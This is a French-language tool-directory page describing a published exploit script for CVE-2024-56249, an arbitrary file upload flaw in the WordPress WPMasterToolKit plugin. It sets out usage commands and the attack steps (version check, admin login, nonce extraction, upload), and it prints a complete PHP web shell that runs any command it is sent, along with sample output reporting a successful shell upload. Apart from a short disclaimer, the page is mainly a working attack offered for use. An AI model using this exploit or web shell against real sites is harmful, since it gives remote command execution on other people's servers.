Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-56249 — WordPress WPMasterToolKit plugin <= 1.13.1 - vulnérabilité de téléchargement arbitraire de fichiers | Kitploit
Outils/GitHubGitHub/nxploited/cve-2024-56249
Génération de PayloadsAnalyse des VulnérabilitésExploitationShellcodeExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubnxploited/cve-2024-56249

CVE-2024-56249

WordPress WPMasterToolKit plugin <= 1.13.1 - vulnérabilité de téléchargement arbitraire de fichiers

Voir le dépôt
111il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🛠️ Exploitation du Master Toolkit WordPress (CVE-2024-56249)

🌟 Aperçu

Ce script exploite une vulnérabilité de téléchargement arbitraire de fichier dans le plugin WordPress WPMasterToolKit, permettant à un attaquant de télécharger une coque web (web shell) sur le serveur. La vulnérabilité existe dans les versions <= 1.13.1 du plugin.

📝 Détails du CVE

  • Identifiant CVE : CVE-2024-56249
  • Publié : 2025-01-02
  • Mis à jour : 2025-01-02
  • Description : Vulnérabilité de téléchargement sans restriction de fichier de type dangereux dans Webdeclic WPMasterToolKit permettant de télécharger une coque web (Web Shell) sur un serveur web.
  • CWE : CWE-434 : Téléchargement sans restriction de fichier de type dangereux
  • Score CVSS : 9.1 (Critique)
  • Vecteur CVSS : CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

🚀 Utilisation

Pour exploiter cette vulnérabilité, utilisez la commande suivante :

root@kitploit:~
python CVE-2024-56249.py -u <URL> -un <USERNAME> -p <PASSWORD> -fn <FILENAME>

📋 Paramètres

  • -u / --url : URL WordPress cible (ex. http://192.168.100.74:888/wordpress)
  • -un / --username : Nom d'utilisateur administrateur WordPress
  • -p / --password : Mot de passe administrateur WordPress
  • -fp / --filepath : Chemin de téléchargement du fichier (par défaut : wp-content/uploads/2025/03)
  • -fn / --filename : Nom du fichier à télécharger (par défaut : shell.php)

🧩 Explication du script

🔍 1. Sonder la vulnérabilité

Le script commence par sonder l'URL cible pour vérifier si elle est vulnérable à la CVE-2024-56249 en contrôlant la version du plugin WPMasterToolKit.

🔑 2. Authentification à WordPress

Il tente ensuite de se connecter au panneau d'administration WordPress en utilisant les identifiants fournis.

🛡️ 3. Extraction des jetons de sécurité

Après une connexion réussie, le script extrait les jetons de sécurité nécessaires (nonce et jeton) requis pour le téléchargement du fichier.

📤 4. Déploiement de la charge utile

Il télécharge le fichier spécifié (par exemple, une coque web) sur le serveur cible en utilisant les jetons extraits.

✅ 5. Vérification du téléchargement

Enfin, le script vérifie si le fichier a été téléchargé avec succès en contrôlant son accessibilité via l'URL cible.

📂 Remarque

Assurez-vous que le fichier de la coque (par exemple shell.php) se trouve dans le même répertoire que le script avant de l'exécuter. Ceci est nécessaire pour que le script puisse localiser et télécharger le fichier avec succès.

Exemple de fichier de coque (shell.php)

root@kitploit:~
<?php
if(isset($_REQUEST['cmd'])){
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
}
?>

💡 Exemple

root@kitploit:~
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php

🖥️ Sortie

root@kitploit:~
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php
[🔍] Detected plugin version: 1.13.1
[🔥] Target is VULNERABLE to CVE-2024-56249! Exploiting...
[🔑] Attempting to log in...
[✅] Authentication successful!
[📡] Extracting security tokens...
[✅] Extracted nonce: e4ae47c8d8
[✅] Extracted token: e4ae47c8d8
[📤] Attempting to upload shell.php to wp-content/uploads/2025/03...
[✅] Upload request sent successfully.
[🔥] Shell successfully uploaded! Access it here: http://target/wp-content/uploads/2025/03/shell.php

🛠️ Utilisation du script

root@kitploit:~
usage: CVE-2025-1307.py [-h] -u URL -un USERNAME -p PASSWORD [-fp FILEPATH] [-fn FILENAME]

Master Toolkit Exploit CVE-2024-56249 #by Nxploit | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g., http://192.168.100.74:888/wordpress4/)
  -un, --username USERNAME
                        WordPress admin username
  -p, --password PASSWORD
                        WordPress admin password
  -fp, --filepath FILEPATH
                        File upload path (default: wp-content/uploads/2025/03)
  -fn, --filename FILENAME
                        File name to upload (default: shell.php)

⚠️ Avertissement

Cet outil est destiné uniquement à des fins éducatives. Utilisez-le à vos propres risques. L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par cet outil.


Script d'exploit par Nxploit | Khaled Alenazi

Télécharger l’outil